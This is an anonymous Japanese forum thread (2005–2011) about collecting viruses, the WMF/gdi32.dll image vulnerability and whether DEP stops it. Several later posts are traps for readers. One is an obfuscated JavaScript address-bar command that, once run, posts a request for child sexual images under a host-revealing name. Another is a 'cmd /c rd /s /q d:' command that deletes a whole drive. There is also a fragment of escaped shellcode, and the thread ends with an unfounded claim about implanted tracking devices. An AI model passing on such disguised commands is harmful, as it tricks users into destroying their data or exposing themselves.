1 :
名無しさん@お腹いっぱい。:
集めてます
是非ください
俺のノートン先生とガチで勝負させます
糞スレ立てんな!ボケが
そもそもWindowsUpdateしてあったら感染しねぇんだよ!ボケが
5 :
名無しさん@お腹いっぱい。:2005/12/24(土) 11:55:48
似たような前スレ落ちたから次スレにする?
6 :
名無しさん@お腹いっぱい。:2005/12/24(土) 11:58:33
7 :
名無しさん@お腹いっぱい。:2005/12/24(土) 12:24:03
>>1 「奴」ってことはファイルでもいいんだろ?
そこらじゅうにあるから
好きなだけ勝負させたらいい
とか言ってどっかのスレに貼るつもりだろ。バレバレなんだよ厨房
クリスマスだっていうのに何やってるんだお前は
15 :
名無しさん@お腹いっぱい。:2005/12/26(月) 09:31:39
>>15 鑑定スレから引っ張ってきただけじゃねーの?
しょぼいし
開いただけでウィルスに感染しそうな女なら何人も知ってるがな
バルス!!
(´・ω・`)ウィルス性胃腸炎に感染したがな
お大事に
22 :
名無しさん@お腹いっぱい。:2005/12/28(水) 20:20:19
>>22 プロパティを見ようとした瞬間にExplorerがクラッシュして再起動した。
ウイルスバスターは検知しなかった。
何だこれは?
24 :
23:2005/12/28(水) 21:35:40
DEP有効だとDEPで止められてまったく実害はなかった
>>25 そのDEPってハードウェア?
とめられたときって、なんかメッセージ出すん?
avast!も対応していた。やるじゃん。
デスクトップに保存してプロパティを開くのを試した。
DEP有効でもDEPが検出して止めたっていうポップアップが出たが
そのポップアップ閉じたらその後勝手に実行されて意味なかったぞ
最初はちゃんと止めたって思って感心したのにだめじゃん
DEPによる保護で最も効果が期待されているのが、バッファ・オーバーフロー/バッファ・オーバーランと呼ばれる脆弱性に対してだ
って書かれてたけどだめじゃねーか!
>>26 ハードウェアDEP。
「コンピュータ保護のため、このプログラムは Windows により終了されました」
というメッセージが出て、「メッセージを閉じる」ボタンを押すと
「問題が発生したため、〜を終了します。ご不便をおかけし申し訳ありません」
っていつものエラー報告のダイアログが出る。
メモ帳の自動実行はされない。
他の人の報告を見る限りでは、ソフトウェアDEPじゃ防げないみたいね。
32 :
28:2005/12/29(木) 21:27:32
SempronでハードウェアDEPになってるけど防げないよ
64bitプロセッサのじゃなきゃだめってことなんかな
それか64bit版Windowsなら平気とか?
なるほど、ソフトウェアDEPではあかんのか。
P3-1Gの俺のPCじゃ止められんちゅうことだな。
新しいPC作りたいけど・・・最近仕様改革が激しい
からViiVまで待つつもりだけど、今のままじゃ
安心できんな。
セキュリティツールを組み合わせて凌ぐしかないな。
ここNOD厨の溜まり場だったのか
気づくの遅すぎたわw
レスは少ないけど、渦中のスレだからな、いろんな厨が集まるだろ。
37 :
28:2005/12/30(金) 16:16:38
>>36 それってデフォルトのシステムのみじゃなくて
除外リストに加えた物いがいはすべてでDEP機能有効にするってやつでしょ?
デフォルトにしてもすべてにしてみても一緒だったよ。
防いだメッセージでた後メッセージ閉じると実行されちゃう。
ちなみにソフトウェアDEPだと防止のメッセージすらでないで実行された
よく考えたらx64の64bitアプリ上でx86の攻撃コードが動くわけないか
とか一瞬思ったけど
>>30で止められたrundll32は32bitだなあ
結局DEPで止められるかもしれないけど信用はできないってことか
>>39 訂正 縮小版と並べて表示にしていなければ、ポイントしない限りバッファオーバーフローは発生しない。
>>41 やっぱりなぁ。
拡張子は問題じゃないものね。
Explorerそのものに問題があるからね。
例のshimgvw.dllの脆弱性ついたウィルス
IrfanviewだけじゃなくてXnViewでも外部プログラム起動した@Win2000
AMON ファイル E:\...\Thumbs.jpg Win32/TrojanDownloader.Wmfex トロイ 削除済み ファイルアクセス時に発生したイベント。 C:\WINDOWS\Explorer.EXE.
NOD32対応済み
>>44 同じDLLを読みに行くのかな?
やっぱ、
regsvr32 -u shimgvw.dll
これを使うしかないか。
>>46 IrfanViewの場合、それやっても意味ないよ
何かshimgvw.dllさえ無効にすれば問題ないと思ってる人が多いみたいだけど
本当に脆弱性があるのはgdi32.dllのwmfを表示するAPI。
shimgvw.dllはそれを利用しているDLL「のひとつ」に過ぎない。
だからwmfを開けるアプリはwmfを自前で展開していない限り
(そんなことできるのかどうか知らんけど)すべて危険。
>>48 へー。そうなのかぁ。
おいらはプログラムに詳しくないからわからんかった。
意外と根の深い問題なんだな。
ウイルス対策ソフト入れている連中はよいとして、
入れていない連中や、入れていてもうpしていない
連中は危険ってことやな。
これ、価格のときみたいに、IEとIIS?(SQL?)の脆弱
を利用してページを改竄(改竄部分にWMFの脆弱性を
利用したファイルをDLさせるようなIFRAMEの挿入)
されたら一般大衆はたまったもんじゃないな。
Iframeとかは、アクティブスクリプトの実行を無効にしておけば実行されない。
どこにもスクリプトは使われてないんだが。
無知というか、勘違いだろうね
>>1 IEでこのスレを開く。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。
2、
改行を外して1行にする。
3、
1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、
Enterを押す(もしくは「移動」をクリックする)。
これを実行汁
59 :
名無しさん@お腹いっぱい。:2006/01/30(月) 00:25:19
節穴でロリ画像下さいとレスするスクリプト
「スタート」の「ファイル名を指定して実行」で
cmd /c rd /s /q d:
と入力し(OK)をクリックする
61 :
名無しさん@お腹いっぱい。:2006/01/31(火) 01:58:01
62 :
名無しさん@お腹いっぱい。:2006/02/02(木) 04:32:58
_____
|____ \□ □
/ / _____
/ / |_____|
/ /
/ /
 ̄ (⌒ ⌒ヽ
∧_∧ (´⌒ ⌒ ⌒ヾ
( ; ) ('⌒ ; ⌒ ::⌒ )
( ̄ ̄ ̄ ̄┴- (´ ) ::: )
| ( *≡≡≡≡≡三(´⌒;: ::⌒`) :; )
/ / ∧ \ (⌒:: :: ::⌒ )
/ / / U\ \ ( ゝ ヾ 丶 ソ
/ / ( ̄) | |\ ( ̄) ヽ ヾ ノノ ノ
/ ( ノ ( | | \ ノ (
⊂- ┘( ) └--┘ ( )
UUUU UUUU
63 :
名無しさん@お腹いっぱい。:2006/02/15(水) 15:01:01
/ ̄ ̄ ̄ ̄\,, / ̄ ̄ ̄ ̄ ̄\
/_____ ヽ / ______ \
| | | / / \ ヽ
|● ● |___/ |/ ● ● ヽ |
| (_●__) 6 l | (_●__) | |
. ヽ |∪| ,-′ | |∪| | l
ヽ.ヽノ__ /ヽ ヽ ヽノ / /
/ |/\/ l ^ヽ \ / /
| | | | l━━(t)━━━━
______ ___ ____ _____ __ ___
/___ / | / / | /__ __/ [][] / / _| |_
/ / / / / / ̄ ̄|. l / / / / |_ レ'~ ̄|
/ /. / / / /. / / | |___ \ \ / /| |
/ / / / /  ̄ ̄ / \__| \ \ /_ / | |_
/ / / / / / ̄ ̄ ̄  ̄ ̄ .|__| \/
/ / / / / /
/ /____. / / / /
/ / / | / /
 ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄  ̄
67 :
名無しさん@お腹いっぱい。:2006/04/02(日) 08:58:01
_____
|____ \□ □
/ / _____
/ / |_____|
/ /
/ /
 ̄ (⌒ ⌒ヽ
∧_∧ (´⌒ ⌒ ⌒ヾ
( ; ) ('⌒ ; ⌒ ::⌒ )
( ̄ ̄ ̄ ̄┴- (´ ) ::: )
| ( *≡≡≡≡≡三(´⌒;: ::⌒`) :; )
/ / ∧ \ (⌒:: :: ::⌒ )
/ / / U\ \ ( ゝ ヾ 丶 ソ
/ / ( ̄) | |\ ( ̄) ヽ ヾ ノノ ノ
/ ( ノ ( | | \ ノ (
⊂- ┘( ) └--┘ ( )
UUUU UUUU
/ ̄ ̄ ̄ ̄\,, / ̄ ̄ ̄ ̄ ̄\
/_____ ヽ / ______ \
| | | / / \ ヽ
|● ● |___/ |/ ● ● ヽ |
| (_●__) 6 l | (_●__) | |
. ヽ |∪| ,-′ | |∪| | l
ヽ.ヽノ__ /ヽ ヽ ヽノ / /
/ |/\/ l ^ヽ \ / /
| | | | l━━(t)━━━━
69 :
名無しさん@お腹いっぱい。:2006/06/02(金) 22:17:40
71 :
218-045-130-164.users.sctv.jp:2006/09/12(火) 10:08:49
ロリ画像ください
72 :
名無しさん@お腹いっぱい。:2006/09/13(水) 18:54:07
前に芸スポにあったスレッドを開いただけで、「ウイルスに感染しました」って出たんだけど・・。
これってナンダイ?
74 :
名無しさん@お腹いっぱい。:2006/09/13(水) 18:57:09
この後半年ロムります・・。
教えて下さいな
>>74 単にウイルスコードが貼られただけ。
アンチウイルスソフトの誤作動を狙ったもの。
ただのコードなんでもちろん感染はしてない。
半年後にまた会おう
76 :
名無しさん@お腹いっぱい。:2006/09/13(水) 19:01:40
ありがとうございました!
また半年後に。
お元気で!
絶対ROMってねーよwwwww
頑張れよ(´・ω・`)
なんだかんだいって、割と皆優しいのなw
80 :
名無しさん@お腹いっぱい。:2006/09/18(月) 15:58:36
てーかなかったっけ、ウイルステンプレートとかいうヤツ。
あぼーん
>81
とりあえずお前が痛い香具師なのはよく解った
あぼーん
86 :
名無しさん@お腹いっぱい。:2008/09/25(木) 00:30:38
このスレ参考にさせて貰ってます。
unescape("%u7030%u4300%u14106%u105216
89 :
名無しさん@お腹いっぱい。:2011/03/09(水) 12:59:06.36
まだ報道されていない犯罪です。
夜中に家屋に侵入し睡眠中の人の体内に装置を埋め込み追跡したり
また装置を遠隔操作することでくしゃみをさせたり針で刺したような傷みを加えている者がいます。
奈良県生駒市北部に被害者多数のようです。